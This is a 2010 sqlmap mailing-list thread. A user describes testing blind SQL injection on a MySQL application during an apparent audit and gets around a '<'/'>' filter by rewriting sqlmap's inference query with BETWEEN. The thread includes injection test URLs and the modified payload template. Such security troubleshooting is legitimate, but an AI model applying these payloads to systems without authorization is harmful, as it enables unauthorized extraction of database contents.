Re: [sqlmap-users] blind sql injection problem

[velky b. <vel...@gm...>]

Ok, I have resolved the problem. Just brief info for other users:
If characters like '<' or '>' are filtered, it is possible to modify query
like this

<inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>

vb

On Sat, Feb 20, 2010 at 6:38 PM, velky brat <vel...@gm...> wrote:

> Hello,
> I have found blind SQL injection in the GET parameter of  audited MySQL
> application (also sqlmap is able to identify the injection), but it is not
> possible to dump any data (like --current-user or --current-db). Only
> option, which is working is --fingerprint (gives correct result of mySQL 5
> version), all other options gave the same result as "None".
> Because it looked strange to me, I made some basic tests manually with
> following results:
>
>
> http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
> http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
>
> http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
> http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be  FALSE)
>
> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE
>
> As you can see from these results, it looks that  characters "<" and ">"
> are filtered within application.
>
> However, injection is still working. I suppose, that sqlmap uses these
> characters ("<",">") really often during dumping of data from database.
> So I have changed the following line in mysql section of queries.xml file:
>
> original line:
> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
>
> updated line:
> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>
> Unfortunatelly, the result was same (None). What else should be modified?
>
> Is it be possible to use BETWEEN statement instead of ">" in current
> version of sqlmap?
> Is it already supported somehow in sqlmap or would it appear in future
> versions?
>
> Thank you in advance
>
> vb
>
>